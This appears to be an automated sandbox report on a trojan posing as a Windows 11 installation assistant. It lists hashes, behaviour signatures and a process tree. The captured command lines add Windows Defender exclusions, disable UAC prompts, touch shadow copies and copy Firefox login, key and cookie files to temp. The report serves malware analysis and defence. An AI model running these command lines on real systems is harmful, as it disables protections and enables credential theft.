Analysis
max time kernel: 150s
max time network: 135s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 14-11-2024 23:57
Static task: static1
Behavioral task: behavioral1 (Sample: Trojan.Win32.DelShad.exe, Resource: win7-20240903-en)
Behavioral task: behavioral2 (Sample: Trojan.Win32.DelShad.exe, Resource: win10v2004-20241007-en)
Behavioral task: behavioral3 (Sample: Trojan.Win32.DelShad.exe, Resource: win10ltsc2021-20241023-en)
Behavioral task: behavioral4 (Sample: Trojan.Win32.DelShad.exe, Resource: win11-20241007-en)
General
Target: Trojan.Win32.DelShad.exe
Size: 30.2MB
MD5: 52cc1d2fbc403848c18f3c95dd63d727
SHA1: 9c5067b86ffc4ab6908aea7d9adf0b82353db3af
SHA256: a9883030a711aebd2ec7faff0091135ee590a0e6ac613a963f55e43edc00c595
SHA512: 7e59c7ae07bca570ce162633cfac5817bc6f012168afa3a24def0c95fef3c3251648a560761e9d967db36b31e437dbd2ed2ac884d62d4c4ee61a808a830754a0
SSDEEP: 393216:jQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37XtjUIahEeBLQV5xOYevAex37Xq:cj8579oIIaj8579oIIaj8579oIIF
Malware Config
Signatures
Processes:
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\WIndoWs defender sECuritY centEr\notIFICATions\dIsablEEnhAncEdnOtiFiCatiOns = "1" (reg.exe)
- Key created: \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions (reg.exe)
Processes:
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" (reg.exe)
Processes:
- Key created: \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns (rEg.EXE)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\Cmd = "0" (rEg.EXE)
- Key created: \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns (rEg.EXE)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\EXE = "0" (rEg.EXE)
- Key created: \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs (rEG.EXE)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs (rEG.EXE)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\ExclUSiOnS\EXTENsiONs\SCr = "0" (rEG.EXE)
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
Disables use of System Restore points 1 TTPs
Drops file in Drivers directory 1 IoCs
Processes:
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (cmd.exe)
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Windows11InstaIIation.sCr)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Windows11InstaIIation.sCr)
Drops startup file 1 IoCs
Processes:
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk (Trojan.Win32.DelShad.tmp)
Executes dropped EXE 17 IoCs
Processes:
- PID 5112: Trojan.Win32.DelShad.tmp
- PID 244: Trojan.Win32.DelShad.tmp
- PID 5004: pik.exe
- PID 3448: rp.exe
- PID 4636: rp.exe
- PID 1220: rp.exe
- PID 2412: rp.exe
- PID 2028: rp.exe
- PID 2372: rp.exe
- PID 2200: rp.exe
- PID 2500: rp.exe
- PID 1536: rp.exe
- PID 1800: rp.exe
- PID 4136: rp.exe
- PID 3416: rp.exe
- PID 5064: Windows11InstaIIation.scr
- PID 3788: Windows11InstaIIation.sCr
Modifies file permissions 1 TTPs 2 IoCs
Processes:
- PID 2116: icacls.exe
- PID 4780: icacls.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 7: ipINFO.io
Suspicious use of SetThreadContext 1 IoCs
Processes:
- PID 5064 set thread context of 3788: 5064 Windows11InstaIIation.scr (procid_target 178)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 24 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (curl.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Trojan.Win32.DelShad.tmp)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (taskkill.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Trojan.Win32.DelShad.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Windows11InstaIIation.sCr)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Trojan.Win32.DelShad.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Windows11InstaIIation.scr)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Trojan.Win32.DelShad.tmp)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (rp.exe)
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
- PID 2852: find.exe
- PID 4268: find.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (Windows11InstaIIation.sCr)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (Windows11InstaIIation.sCr)
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (Windows11InstaIIation.sCr)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (Windows11InstaIIation.sCr)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Windows11InstaIIation.sCr)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion (Windows11InstaIIation.sCr)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion (Windows11InstaIIation.sCr)
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- PID 860: vssadmin.exe
Kills process with taskkill 1 IoCs
Processes:
- PID 4912: taskkill.exe
Modifies data under HKEY_USERS 20 IoCs
Processes:
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (rp.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (rp.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (rp.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (rp.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (rp.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (rp.exe)
Suspicious behavior: EnumeratesProcesses 56 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
- PID 244: Trojan.Win32.DelShad.tmp
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
- PID 5064: Windows11InstaIIation.scr
Suspicious use of WriteProcessMemory 64 IoCs
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
Command lines below are reproduced as captured, including the sample's mixed-case spelling of registry paths and tool names (e.g. rEG.EXE, hklM\soFtwarE). Note that the dropped screensaver is named Windows11InstaIIation.scr with capital I in place of lowercase l, while its folder and the startup .lnk use the ordinary spelling Windows11InstallationAssistant.
Process (level 1): C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2488
Process (level 2): C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp
Command line: "C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp" /SL5="$D023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 5112
Process (level 3): C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 1092
Process (level 4): C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp
Command line: "C:\Users\Admin\AppData\Local\Temp\is-KI35J.tmp\Trojan.Win32.DelShad.tmp" /SL5="$E023E,9723063,876544,C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe" /verysilent /sp-
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID: 244
Process (level 5): C:\Windows\SysWOW64\taskkill.exe
Command line: "C:\Windows\system32\taskkill.exe" /f /im "Windows11InstaIIation.scr"
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID: 4912
Process (level 5): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID: 5004
Process (level 5): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd""
- System Location Discovery: System Language Discovery
PID: 3760
Process (level 6): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3448
Process (level 7): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 4636
Process (level 8): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID: 2412
Process (level 9): C:\Windows\system32\rEG.EXE
Command line: "C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
- Windows security bypass
PID: 2472
Process (level 6): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1220
Process (level 7): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2028
Process (level 8): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID: 2500
Process (level 9): C:\Windows\system32\rEg.EXE
Command line: "C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
- Windows security bypass
PID: 2860
Process (level 6): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2372
Process (level 7): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 2200
Process (level 8): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID: 1800
Process (level 9): C:\Windows\system32\rEg.EXE
Command line: "C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
- Windows security bypass
PID: 1284
Process (level 6): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 1536
Process (level 7): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 4136
Process (level 8): C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID: 3416
Process (level 9): C:\Windows\system32\rEG.EXE
Command line: "C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
PID: 4444
Process (level 5): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd""
- System Location Discovery: System Language Discovery
PID: 2820
Process (level 6): C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
- System Location Discovery: System Language Discovery
PID: 1636
Process (level 7): C:\Windows\SysWOW64\curl.exe
Command line: CUrL -S ipINFO.io/Ip
- System Location Discovery: System Language Discovery
PID: 4888
Process (level 5): C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
Command line: "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID: 5064
Process (level 6): C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr
Command line: "C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
- Checks BIOS information in registry
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID: 3788
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\qf16owjrosxtg1b240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\1apee2pq240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\oia5c9p871t240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\936i6c2ysb240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\foe3ysq410f240645453.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID: 2072
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ncbfn8vuxc240664046.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\t31j3c804mqki240664046.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID: 3180
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\kxwijg5d0240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\rosnq51ksrisakub240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\irf37rj215240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\0pg7b8xtdpt240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\13s111wjws4240672703.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID: 1772
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ne9rtc7kbn240678812.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\iv06ldrfve1q240678812.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID: 2820
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\9cfdnzmzgmbbf2240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\mgec5fx5240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\kgjwak4w4a2240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\egswv9dl2ib240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\8pt5qxkvfy240684187.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID: 320
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\vvk7o2jve6r240695546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ikpx0390o67sm1ea240695546.tmp\" -Force"
- Suspicious behavior: EnumeratesProcesses
PID: 4880
